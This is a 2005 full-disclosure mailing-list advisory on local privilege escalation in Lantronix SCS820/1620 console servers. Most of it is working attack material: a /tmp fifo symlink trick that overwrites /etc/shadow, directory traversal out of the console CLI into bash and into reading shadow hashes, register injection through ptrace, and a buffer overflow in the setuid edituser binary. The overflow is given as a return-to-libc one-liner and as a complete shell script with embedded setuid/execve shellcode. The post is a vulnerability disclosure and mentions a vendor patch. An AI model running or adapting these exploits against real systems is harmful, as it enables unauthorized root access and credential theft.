[Full-disclosure] Root exploit in Lantonix Secure Console Server

From: c0ntex (c0ntexb_at_gmail.com)
Date: 08/05/05

  • Next message: Willem Koenings: "Re: [Full-disclosure] Malicious Code Analysis"
    Date: Fri, 5 Aug 2005 15:58:24 +0100
    To: full-disclosure@lists.grok.org.uk
    
    

     /*
      *****************************************************************************************************************
      $ An open security advisory #11 - Lantronix SCS Local Root Exploits

    *****************************************************************************************************************
      1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com || c0ntex[@]open-security.org
      2: Bug Released: August 05 2005
      3: Bug Impact Rate: Hi
      4: Bug Scope Rate: Local
      *****************************************************************************************************************
      $ This advisory and/or proof of concept code must not be used for
    commercial gain.
      *****************************************************************************************************************

      SCS820/1620 - Lantronix Secure Console Server
      http://www.lantronix.com

      "The SCS820 and SCS1620 are members of the ActiveLinx family of
    secure console servers (SCS).
      With ActiveLinx secure console servers, system administrators can
    tackle local and remote IT
      incidents in record time. IT professionals gain key business
    advantages such as reduced time
      attending problems and lowered total cost of ownership for equipment
    and maintenance. Secure
      console servers provide a significant return on investment with
    faster problem solving
      capabilities and higher uptime."

      Multiple security issues with Lantronix Secure Console Server mean
    that it is trivial for a
      user to become root and cause trouble on the system by abusing
    buffer overflows and insecure
      file system configurations.

      1) Insecure /tmp and pipe permissions.
      2) Directory traversal allowing local users unauthorised access to
    underlying Linux OS.
      3) Sysadmin gains local root by abusing the fact that ci does not
    drop root privileges.
      4) All users local root via edituser using return-to-libc and
    generic stack smash.

      Lantronix have released a fix for these issues in their latest
    patch, Firmware v4.4

      Example 1: Overwrite root owned files
      ----------
      [c0ntex@SCS1620 /tmp]$ ls -al
      total 2
      drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
      drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
      prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|

      [c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
      [c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server

      Now user waits for system administrator to log in and do some work
    on the console:
     
      sysadmin>listen 01
      Please wait for connection..
      sysadmin-DEVICE_01>logout

      [sysadmin@SCS1620 /tmp]$ su - root
      Password:
      su: incorrect password # odd......

      From another window:
      [root@SCS1620 /tmp]# head /etc/shadow
      j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
      bin:*:11529:0:99999:7:::
      daemon:*:11529:0:99999:7:::
      adm:*:11529:0:99999:7:::

      Example 2: Directory traversal to gain access to underlying system
      ----------
      c0ntex>?
      Commands:
      alias - List command aliases
      cat - Print history buffer
      clear - Clear port buffer
      connections - show active connections
      ...
      c0ntex>/bin/bash
      /bin/bash: unknown command
      c0ntex>
      c0ntex>
      c0ntex>../../../bin/bash
      [c0ntex@SCS1620 /var/tmp]$

      Example 3: Sysadmin becomes root
      ----------
      sysadmin>
      sysadmin>
      sysadmin>bash
      sysadmin@SCS1620 /var/tmp$
      sysadmin@SCS1620 /var/tmp$
      sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
      cat: /etc/shadow: Permission denied
      sysadmin@SCS1620 /var/tmp$
      sysadmin@SCS1620 /var/tmp$
      sysadmin@SCS1620 /var/tmp$ exit
      sysadmin>../../../bin/cat /etc/shadow
      root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
      bin:*:11529:0:99999:7:::
      daemon:*:11529:0:99999:7:::
      ...
      sysadmin>../../../bin/vi
      ~
      ~
      ~
      ~
      ~
      :!cat /etc/shadow
      root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
      bin:*:11529:0:99999:7:::
      daemon:*:11529:0:99999:7:::
      ...
      ~
      ~
      ~
      ~
      ~
      :q!

      Run bash from the ci interface as sysadmin and from strace, we get
    the following:

      sysadmin>bash
      ...
      14441 [400d8367] getuid() = 500
      14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0

      and via directory traversal:

      sysadmin> ../../../bin/bash
      ...
      14392 [400ab367] getuid() = 500
      14392 [400ab3c7] getgid() = 100
      14392 [400ab397] geteuid() = 0
      14392 [400ab3f7] getegid() = 100
      ...

      sysadmin>../../../home/sysadmin/snakeoil 10719

      Attached process [10719] OK!
      ++ Stack regsiters for PID of [10719] ++
            Stack Address of %eax = [0xfffffe00]
            Stack Address of %ecx = [0xbffff100]
            Stack Address of %edx = [0x00000000]
            Stack Address of %ebx = [0xffffffff]
            Stack Address of %esp = [0xbffff0c8]
            Stack Address of %ebp = [0xbffff0e8]
            Stack Address of %esi = [0x00000000]
            Stack Address of %edi = [0xffffffff]
            Stack Address of %eip = [0x400d79a9]

      Injecting %eip register with [0xbffff2bb]

      ++ Stack regsiters for PID of [10719] ++
            Stack Address of %eax = [0xfffffe00]
            Stack Address of %ecx = [0xbffff100]
            Stack Address of %edx = [0x00000000]
            Stack Address of %ebx = [0xffffffff]
            Stack Address of %esp = [0xbffff0c8]
            Stack Address of %ebp = [0xbffff0e8]
            Stack Address of %esi = [0x00000000]
            Stack Address of %edi = [0xffffffff]
            Stack Address of %eip = [0xbffff2bb]
      Detached process [10719] OK!

      bash#

      Example 4: Become root - Buffer overflow in edituser binary

      The edituser binary is used to edit a users configuration parameters
    found in UserName.conf.
      It lets you set escape sequences, server permissions and other basic
    user permissions and
      features of the Secure Console Server.

      During exploitation, edituser will strip \xff from the input, so you
    have to use a retaddr
      that does not have the standard 0xbfff1234 type address. By creating
    a large pad environment
      variable before running the test you can nudge your shellcode to a
    nice location, such as
      0xbffe1234, which lets us get round this trivial obstacle. The
    return-to-libc method also
      needs the stack nudge since the address for "/bin/sh" is stored in
    the environment.

      [sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
      -rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
      [sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex
      Password:
      bash$ cp `which edituser` . && gdb -q ./edituser
      no debugging symbols found)...gdb>
      gdb>
      gdb>r -b `perl -e 'printf "\x41" x 70'`
      escape sequence is too long.
      (no debugging symbols found)...(no debugging symbols found)...(no
    debugging symbols found)...(no
      debugging symbols found)...
      Program received signal SIGSEGV, Segmentation fault.
      _______________________________________________________________________________
           eax:00000000 ebx:00000004 ecx:4001A94B edx:4010B140 eflags:00010246
           esi:0804BC0C edi:00000000 esp:BFFEC748 ebp:41414141 eip:41414141
           cs:0023 ds:002B es:002B fs:0000 gs:0000 ss:002B o d I t s Z a P c
      [002B:BFFEC748]---------------------------------------------------------[stack]
      BFFEC778 : 28 D6 04 08 6C C9 10 40 - 70 A8 00 40 94 F8 FE BF
    (...l..@p..@....
      BFFEC768 : 8C 9B 04 08 01 00 00 00 - 60 BC 04 08 08 BC 04 08
    ........`.......
      BFFEC758 : BC BC 04 08 F0 C7 FE BF - 01 00 00 00 48 F8 FE BF
    ............H...
      BFFEC748 : 41 41 41 41 41 41 41 41 - 41 41 00 08 FF FF FF FF
    AAAAAAAAAA......
      [002B:0804BC0C]---------------------------------------------------------[
    data]
      0804BC0C : 39 BA 01 40 2C BA 01 40 - 1E BA 01 40 10 BA 01 40
    9..@,..@...@...@
      0804BC1C : 00 00 00 00 00 00 00 00 - 03 00 00 00 00 00 00 00
    ................
      [0023:41414141]---------------------------------------------------------[
    code]
      0x41414141: Error while running hook_stop:
      Error while running hook_stop:
      Cannot access memory at address 0x41414141
      0x41414141 in ?? ()
      gdb> q

      //return-to-libc version for non-exec-stack systems

      [c0ntex@SCS1620 ~]$ id -a
      uid=501(c0ntex) gid=501(c0ntex) groups=501(c0ntex)
      [c0ntex@SCS1620 ~]$ export STACKPAD=`perl -e 'print "A" x 65000'`
      [c0ntex@SCS1620 /home/c0ntex]$ edituser -e `perl -e 'print "A" x
    56'``printf "\x70\xe6\x05\x40\x70\xe6\x05\x40\x81\xfd\xfe\xbf"`
      escape sequence is too long.
      bash: /bin/bash/.bashrc: Not a directory
      bash#

      //general stack-smash version for older boxes

      #!/bin/sh
      # Lantronix Secure Console Server edituser root exploit by
      # c0ntex - c0ntexb@gmail.com | c0ntex@open-security.org
      # Advisory @ http://www.open-security.org/advisories/11
      #
      # The Linux system supplied by Lantronix does not have gnu
      # C compiler, so the exploit is provided as a shell script
      # as such, you might need to change the address for
      #
      #[c0ntex@SCS1620 ~/exploit]$ sh edituserxp.sh
      #
      # **** *** *** *** *** *** *** *** ***
      #[-] Local root exploit for edituser using return-to-libc
      #[-] discovered and written by c0ntex | c0ntexb@gmail.com
      #Expect a root shell :-) -> escape sequence is too long.
      #bash# id -a
      #uid=0(root) gid=0(root) groups=100(users),0(root),200(admin)
      #bash#
      #
      BUFFPAD="OPEN-SECURITY.ORG**OPEN-SECURITY.ORG**OPEN-SECURITY.ORG!"
      NOPSLED=`perl -e 'print "\x41" x 1000'`
      RETADDR=`printf "\x74\xc2\xfe\xbf"`
      SETUID=`printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"`
      SHELL=`printf
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"`
      STACKPAD=`perl -e 'print "A" x 65000'`
      VULNAP=/usr/local/bin/edituser
      VULNOP="-e"

      export BUFFPAD NOPSLED RETADDR SETUID SHELL STACKPAD VULNAP VULNOP

      printf "\n **** *** *** *** *** *** *** *** ***\n"
      printf "[-] Local root exploit for edituser\n"
      printf "[-] discovered and written by c0ntex\n"

      if [ -f $VULNAPP ] ; then
            printf "Expect a root shell :-) -> "; sleep 1
            $VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
            success=$?
            if [ $success -gt 0 ] ; then
                    printf "\nSeems something messed up, changing NOPBUF
    to 10000 and trying again!\n"
                    sleep 2
                    unset NOPSLED
                    NOPSLED=`perl -e 'print "\x41" x 10000'`
                    printf "Expect a root shell :-) -> "
                    $VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
                    success=$?
                    if [ $success -gt 0 ] ; then
                            printf "\nAgain it failed, sorry you are on
    your own now :(\n"
                    fi
            fi
      fi

    EOF

    -- 
    regards
    c0ntex
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
    

  • Next message: Willem Koenings: "Re: [Full-disclosure] Malicious Code Analysis"